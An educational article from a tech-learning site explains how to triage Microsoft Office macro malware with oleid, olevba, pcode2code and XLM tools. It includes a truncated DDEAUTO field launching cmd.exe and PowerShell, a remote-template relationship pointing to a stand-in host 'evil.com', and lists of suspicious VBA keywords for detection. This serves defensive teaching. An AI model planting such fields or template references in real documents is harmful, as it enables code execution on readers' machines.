EpochZero Learn
EpochZero LearnMulti-Domain Tech Learning Hub
Courses
LeaderboardAbout
Dashboard
EpochZero
EpochZero Learn
Multi-Domain Tech Learning Hub

Structured learning for Reverse Engineering, Cloud Security, Cryptography, and Web Development. Articles, videos, tests, and peer discussion.

Learn

  • Learning Path
  • All Articles
  • Video Lessons
  • Podcast
  • eBooks & PDFs
  • Question Banks
  • Cheatsheets
  • MCQ Banks

Tests & Forum

  • All Tests
  • REMA Tests
  • Cloud Tests
  • Forum
  • REMA Forum
  • Cloud Forum
  • Crypto Forum
  • Web Dev Forum

Campus

  • REMA Club
  • Full Stack Dev Club
  • Extension Activity
  • Events
  • CTF Competitions
  • Workshops
  • Industrial Visits

Platform

  • Dashboard
  • Leaderboard
  • About
  • Verify Certificate

© 2026 EpochZero Learn. Educational content for learning purposes.

Course Instructor: Ashish Revar

All articles
Educationoffice-macrosvbaxlm

Microsoft Office Macro Malware

VBA macro infection chains, document format identification, olevba analysis, P-Code, Excel 4.0 XLM macros, DDEAUTO, remote template injection, and malicious OneNote files — with a complete triage workflow.

Ashish Revar12 May 202618 min read3 views

Sign in to mark this article as read and track your progress.

Related to this topic

Continue learning

Reference material

eBook
REMA eBook 2026
v1.0
Open resource
Cheatsheet
REMA Cheatsheet 2026
v1.0
Open resource
MCQ Bank
REMA MCQ Bank 2026
v1.0
Open resource
Question Bank
REMA Question Bank 2026
v1.0
Open resource

External references

oletools — oleid, olevba, rtfobj Suite

Complete Office malware analysis toolkit. Install via pip. Covers VBA extraction, OLE analysis, and RTF object extraction.

tool
XLMMacroDeobfuscator — Excel 4.0 Macro Analyser

Parses and emulates Excel 4.0 XLM macros. Essential for analysing samples that evade VBA-focused tools.

tool
MITRE ATT&CK — Phishing: Spearphishing Attachment (T1566.001)

ATT&CK technique for malicious document delivery via email with procedure examples and detection guidance.

reference
More articlesTest your knowledge

Why Office Documents Dominate Email Delivery

Microsoft Office documents are the most common malware delivery mechanism via email. The attack relies on:

  1. Social engineering — the document claims to be an invoice, shipping notice, or HR document
  2. Enable Content prompt — macros are disabled by default; the user must click to enable
  3. VBA execution — once enabled, the macro runs with the user''s privileges

Attackers have refined this chain over decades. Despite Microsoft disabling macros by default from the internet in 2022, legacy enterprise configurations and older Office versions remain vulnerable.

Document Format Identification

Always verify format by header bytes — not file extension. Attackers rename formats to bypass filters.

ExtensionFormatHeader BytesMacro Support
.docOLE2 (binary)D0 CF 11 E0VBA in OLE streams
.docxOOXML (ZIP)50 4B 03 04None (macro-free by design)
.docmOOXML (ZIP)50 4B 03 04VBA in vbaProject.bin
.xlsOLE2 (binary)D0 CF 11 E0VBA + Excel 4.0 (XLM) macros
.xlsmOOXML (ZIP)50 4B 03 04VBA + XLM possible
file suspicious.doc           # Linux: identifies by magic bytes
xxd suspicious.doc | head -1  # Show first 16 bytes manually

Step 1: Quick Check with oleid

oleid suspicious.doc

Example output:

Filename: suspicious.doc
-----------------------------
Indicator           Value
-----------------------------
File format:        MS Word 97-2003 Document (.doc)
Container format:   OLE
Encrypted:          False
VBA Macros:         Yes (high risk)
AutoExec macro:     Yes
Suspicious keywords: Shell, CreateObject, WScript, PowerShell

oleid provides a rapid risk assessment in seconds.

Step 2: Extract VBA with olevba

olevba suspicious.doc
olevba -c suspicious.doc        # output only the code
olevba --deobfuscate suspicious.doc

olevba analysis output:

+----------+--------------------+----------------------------------+
|Type      |Keyword             |Description                       |
+----------+--------------------+----------------------------------+
|AutoExec  |AutoOpen            |Runs when document opens          |
|Suspicious|Shell               |May run executable                |
|Suspicious|WScript.Shell       |Command via Windows Script Host   |
|IOC       |powershell.exe      |Executable referenced in macro    |
|IOC       |http://evil.com/x   |URL referenced in macro           |
+----------+--------------------+----------------------------------+

High-risk VBA keywords

KeywordImplication
AutoOpen, Document_Open, Workbook_OpenAuto-execution on document open
Shell(), WScript.ShellCommand execution via shell
CreateObject("WScript.Shell")Shell via COM object
powershell, cmd.exe, mshtaLOLBin invocation
URLDownloadToFile, XMLHTTPFile download
Chr(nn) sequencesCharacter-code obfuscation
String concatenation ("Pow"&"erSh"&"ell")Keyword split to evade scanners

P-Code: The Hidden Execution Layer

P-Code is compiled VBA bytecode stored in a separate stream inside the OLE file. It executes even when the VBA source code has been stripped from the document.

Why this matters: an analyst who removes the visible VBA source using a hex editor but leaves the P-Code stream intact will be deceived — the document still executes the original macro.

pcode2code suspicious.doc    # extract P-Code and convert back to source

Always check for P-Code discrepancies between the visible source and the compiled bytecode.

Excel 4.0 (XLM) Macros

Excel 4.0 macros predate VBA. They are stored directly in spreadsheet cells — not in vbaProject.bin. Many security tools that scan for VBA macros completely miss XLM macros.

XLM macro indicators:

  • Sheets with names like MACRO1, Sheet1 containing unusual cell formulas
  • =EXEC(), =CALL(), =REGISTER() functions in cells
  • Very hidden sheets (hidden attribute set to xlVeryHidden)
XLMMacroDeobfuscator -f suspicious.xls    # parse and emulate XLM macros

DDEAUTO: Macros Without Enabling Macros

Dynamic Data Exchange (DDE) fields in Word documents can execute commands without requiring macros to be enabled:

{ DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -c ..." }

When the document opens, Word attempts to update the DDE field, which executes the command. Word shows a warning prompt but many users click through.

Detection: Open document in a text editor and search for DDEAUTO or DDE followed by a command path. In Procmon, look for Word spawning cmd.exe or powershell.exe.

Remote Template Injection

A .docx file is a ZIP archive. The file word/_rels/settings.xml.rels can reference an external template:

<Relationships>
  <Relationship Type="http://schemas.../attachedTemplate"
    Target="http://evil.com/template.dot"
    TargetMode="External"/>
</Relationships>

When Word opens the document, it fetches the remote template — which can contain VBA macros — and executes them. The initial .docx itself is clean and passes all static scans.

Detection: Unzip the .docx and inspect word/_rels/settings.xml.rels for external Target URLs.

Malicious OneNote Files

Since Microsoft blocked macro-enabled documents by default, attackers shifted to .one (OneNote) files. They embed attached file objects (executables, scripts) that execute when the user clicks a button or image in the notebook.

# OneNote files are not OLE or ZIP — use a dedicated parser
onenote-extractor suspicious.one

Indicators: OneNote files with embedded .exe, .hta, .bat, .vbs, .js objects are almost certainly malicious.

Complete Office Malware Triage Workflow

1. xxd suspicious.doc | head   → verify format by magic bytes
2. oleid suspicious.doc        → rapid risk assessment
3. olevba suspicious.doc       → extract VBA, flag suspicious keywords
4. If Excel: XLMMacroDeobfuscator → check for XLM macros
5. If .docx: unzip + inspect word/_rels/settings.xml.rels → remote template?
6. Search for DDEAUTO in document text
7. pcode2code suspicious.doc   → check P-Code vs visible source
8. Extract IOCs: URLs, file paths, shell commands, PowerShell payloads
9. Detonate in VM with Procmon + FakeNet-NG to confirm behaviour